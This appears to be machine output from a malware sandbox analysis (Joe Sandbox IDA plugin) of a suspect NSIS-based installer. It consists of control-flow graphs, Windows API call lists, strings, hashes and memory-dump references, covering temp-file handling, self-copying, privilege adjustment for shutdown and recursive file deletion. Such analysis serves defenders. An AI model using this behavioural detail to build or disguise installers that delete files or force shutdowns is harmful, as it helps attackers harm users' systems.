6f9412e1 lstrcpyW 5998->6005 6006 6f9411c4 GlobalFree 5998->6006 6000->5998 6001->5999 6002->6006 6003->5998 6004->5998 6005->5998 6006->5998 6007 4014b8 6008 4014be 6007->6008 6009 401389 2 API calls 6008->6009 6010 4014c6 6009->6010 6011 401db9 GetDC 6012 402c1f 17 API calls 6011->6012 6013 401dcb GetDeviceCaps MulDiv ReleaseDC 6012->6013 6014 402c1f 17 API calls 6013->6014 6015 401dfc 6014->6015 6016 40640a 17 API calls 6015->6016 6017 401e39 CreateFontIndirectW 6016->6017 6018 402592 6017->6018 6019 6f94166d 6020 6f941516 GlobalFree 6019->6020 6021 6f941685 6020->6021 6022 6f9416cb GlobalFree 6021->6022 6023 6f9416a0 6021->6023 6024 6f9416b7 VirtualFree 6021->6024 6023->6022 6024->6022 6025 40283b 6026 402843 6025->6026 6027 402847 FindNextFileW 6026->6027 6028 402859 6026->6028 6027->6028 6030 4029e6 6028->6030 6031 4063e8 lstrcpynW 6028->6031 6031->6030

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 36 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->36 37 403749-403763 DeleteFileW call 402f30 29->37 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 38 4036a3-4036b0 call 405cea 33->38 39 4035ea-4035f0 33->39 34->33 36->37 52 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 36->52 56 403814-403824 call 4039e6 OleUninitialize 37->56 57 403769-40376f 37->57 54 4036b2-4036b3 38->54 55 4036b4-4036ba 38->55 43 4035f2-4035fa 39->43 44 40360b-403644 39->44 48 403601 43->48 49 4035fc-4035ff 43->49 50 403661-40369b 44->50 51 403646-40364b 44->51 48->44 49->44 49->48 50->38 53 40369d-4036a1 50->53 51->50 58 40364d-403655 51->58 52->37 52->56 53->38 62 4036c2-4036d0 call 4063e8 53->62 54->55 55->28 63 4036c0 55->63 73 40394a-403950 56->73 74 40382a-40383a call 405a4e ExitProcess 56->74 64 403804-40380b call 403ad8 57->64 65 403775-403780 call 405cea 57->65 59 403657-40365a 58->59 60 40365c 58->60 59->50 59->60 60->50 69 4036d5 62->69 63->69 76 403810 64->76 80 403782-4037b7 65->80 81 4037ce-4037d8 65->81 69->29 78 403952-403968 GetCurrentProcess OpenProcessToken 73->78 79 4039ce-4039d6 73->79 76->56 87 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 78->87 88 40399e-4039ac call 4067c2 78->88 82 4039d8 79->82 83 4039dc-4039e0 ExitProcess 79->83 89 4037b9-4037bd 80->89 85 403840-403854 call 4059b9 lstrcatW 81->85 86 4037da-4037e8 call 405dc5 81->86 82->83 100 403861-40387b lstrcatW lstrcmpiW 85->100 101 403856-40385c lstrcatW 85->101 86->56 99 4037ea-403800 call 4063e8 * 2 86->99 87->88 102 4039ba-4039c5 ExitWindowsEx 88->102 103 4039ae-4039b8 88->103 93 4037c6-4037ca 89->93 94 4037bf-4037c4 89->94 93->89 95 4037cc 93->95 94->93 94->95 95->81 99->64 100->56 105 40387d-403880 100->105 101->100 102->79 106 4039c7-4039c9 call 40140b 102->106 103->102 103->106 109 403882-403887 call 40591f 105->109 110 403889 call 40599c 105->110 106->79 117 40388e-40389c SetCurrentDirectoryW 109->117 110->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 128 40393e-403945 call 4061ae 126->128 127->126 129 403907-403927 call 4061ae call 40640a call 4059d1 127->129 128->56 129->126 138 403929-403930 CloseHandle 129->138 138->126
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                      • GetVersion.KERNEL32 ref: 004034CE
                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                      • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                      • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\WGi85dsMNp.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                      • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                      • String ID: .tmp$1033$C:\Users\user\AppData\Local\Iw\Unnumberable$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WGi85dsMNp.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                      • API String ID: 3441113951-1262075901
                                                                                                      • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                      • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                      • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                      • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 158 4051c7-4051cf 152->158 159 405158-40515e 152->159 153->154 154->151 161 405089-40508c 155->161 162 4050fc-4050ff 155->162 156->152 156->155 190 404f33-404f39 157->190 191 404ff8-40500b GetWindowLongW SetWindowLongW 157->191 167 4051d1-4051d7 SendMessageW 158->167 168 4051d9-4051e0 158->168 164 405164-40516e 159->164 165 4053af-4053c1 call 4043c6 159->165 170 405097-4050ac call 404d1a 161->170 171 40508e-405095 161->171 162->152 166 405101-40510b 162->166 164->165 173 405174-405183 SendMessageW 164->173 175 40511b-405125 166->175 176 40510d-405119 SendMessageW 166->176 167->168 177 4051e2-4051e9 168->177 178 405214-40521b 168->178 170->162 200 4050ae-4050bf 170->200 171->162 171->170 173->165 184 405189-40519a SendMessageW 173->184 175->152 186 405127-405131 175->186 176->175 187 4051f2-4051f9 177->187 188 4051eb-4051ec ImageList_Destroy 177->188 182 405371-405378 178->182 183 405221-40522d call 4011ef 178->183 182->165 195 40537a-405381 182->195 211 40523d-405240 183->211 212 40522f-405232 183->212 193 4051a4-4051a6 184->193 194 40519c-4051a2 184->194 196 405142-40514c 186->196 197 405133-405140 186->197 198 405202-40520e 187->198 199 4051fb-4051fc GlobalFree 187->199 188->187 202 404f3c-404f43 190->202 206 405011-405015 191->206 204 4051a7-4051c0 call 401299 SendMessageW 193->204 194->193 194->204 195->165 205 405383-4053ad ShowWindow GetDlgItem ShowWindow 195->205 196->152 197->152 198->178 199->198 200->162 201 4050c1-4050c3 200->201 207 4050c5-4050cc 201->207 208 4050d6 201->208 209 404fd9-404fec 202->209 210 404f49-404f71 202->210 204->158 205->165 214 405017-40502a ShowWindow call 404394 206->214 215 40502f-405037 call 404394 206->215 217 4050d2-4050d4 207->217 218 4050ce-4050d0 207->218 221 4050d9-4050f5 call 40117d 208->221 209->202 225 404ff2-404ff6 209->225 219 404f73-404fa9 SendMessageW 210->219 220 404fab-404fad 210->220 226 405281-4052a5 call 4011ef 211->226 227 405242-40525b call 4012e2 call 401299 211->227 222 405234 212->222 223 405235-405238 call 404d9a 212->223 214->165 215->140 217->221 218->221 219->209 229 404fc0-404fd6 SendMessageW 220->229 230 404faf-404fbe SendMessageW 220->230 221->162 222->223 223->211 225->191 225->206 241 405347-40535b InvalidateRect 226->241 242 4052ab 226->242 247 40526b-40527a SendMessageW 227->247 248 40525d-405263 227->248 229->209 230->209 241->182 243 40535d-40536c call 404ced call 404cd5 241->243 244 4052ae-4052b9 242->244 243->182 249 4052bb-4052ca 244->249 250 40532f-405341 244->250 247->226 251 405265 248->251 252 405266-405269 248->252 254 4052cc-4052d9 249->254 255 4052dd-4052e0 249->255 250->241 250->244 251->252 252->247 252->248 254->255 257 4052e2-4052e5 255->257 258 4052e7-4052f0 255->258 259 4052f5-40532d SendMessageW * 2 257->259 258->259 260 4052f2 258->260 259->250 260->259
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                      • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                      • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                      • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                      • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                      • String ID: $M$N
                                                                                                      • API String ID: 1638840714-813528018
                                                                                                      • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                      • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                      • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                      • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                      APIs
                                                                                                        • Part of subcall function 6F94121B: GlobalAlloc.KERNEL32(00000040,?,6F94123B,?,6F9412DF,00000019,6F9411BE,-000000A0), ref: 6F941225
                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F941C6B
                                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 6F941CB3
                                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 6F941CBD
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F941CD0
                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F941DB2
                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F941DB7
                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F941DBC
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F941FA6
                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 6F942140
                                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 6F9421B5
                                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 6F9421C6
                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 6F942220
                                                                                                      • lstrlenW.KERNEL32(00000808), ref: 6F94223A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 245916457-0
                                                                                                      • Opcode ID: 5a975ffe5543903f1e5573e555ee20ca4072420e39d85aa07c5ade09c9915ce4
                                                                                                      • Instruction ID: 79a88eb7cb7090d4daed0a8da4221da37701b81b13c34e406d3773e2d9d82e9c
                                                                                                      • Opcode Fuzzy Hash: 5a975ffe5543903f1e5573e555ee20ca4072420e39d85aa07c5ade09c9915ce4
                                                                                                      • Instruction Fuzzy Hash: 27228A71D04209DADB26DFB8C9806EAB7F8FF2A315F10462AD165E61C0D770EAE58F50

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 787 405afa-405b20 call 405dc5 790 405b22-405b34 DeleteFileW 787->790 791 405b39-405b40 787->791 792 405cb6-405cba 790->792 793 405b42-405b44 791->793 794 405b53-405b63 call 4063e8 791->794 795 405c64-405c69 793->795 796 405b4a-405b4d 793->796 802 405b72-405b73 call 405d09 794->802 803 405b65-405b70 lstrcatW 794->803 795->792 798 405c6b-405c6e 795->798 796->794 796->795 800 405c70-405c76 798->800 801 405c78-405c80 call 40672b 798->801 800->792 801->792 811 405c82-405c96 call 405cbd call 405ab2 801->811 806 405b78-405b7c 802->806 803->806 807 405b88-405b8e lstrcatW 806->807 808 405b7e-405b86 806->808 810 405b93-405baf lstrlenW FindFirstFileW 807->810 808->807 808->810 812 405bb5-405bbd 810->812 813 405c59-405c5d 810->813 827 405c98-405c9b 811->827 828 405cae-405cb1 call 405450 811->828 815 405bdd-405bf1 call 4063e8 812->815 816 405bbf-405bc7 812->816 813->795 818 405c5f 813->818 829 405bf3-405bfb 815->829 830 405c08-405c13 call 405ab2 815->830 819 405bc9-405bd1 816->819 820 405c3c-405c4c FindNextFileW 816->820 818->795 819->815 823 405bd3-405bdb 819->823 820->812 826 405c52-405c53 FindClose 820->826 823->815 823->820 826->813 827->800 833 405c9d-405cac call 405450 call 4061ae 827->833 828->792 829->820 834 405bfd-405c06 call 405afa 829->834 838 405c34-405c37 call 405450 830->838 839 405c15-405c18 830->839 833->792 834->820 838->820 842 405c1a-405c2a call 405450 call 4061ae 839->842 843 405c2c-405c32 839->843 842->820 843->820
                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B23
                                                                                                      • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B6B
                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B8E
                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B94
                                                                                                      • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405BA4
                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                      • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                      • API String ID: 2035342205-614058931
                                                                                                      • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                      • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                      • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                      • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                      • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                      • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                      • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406736
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                      • String ID: xgB
                                                                                                      • API String ID: 2295610775-399326502
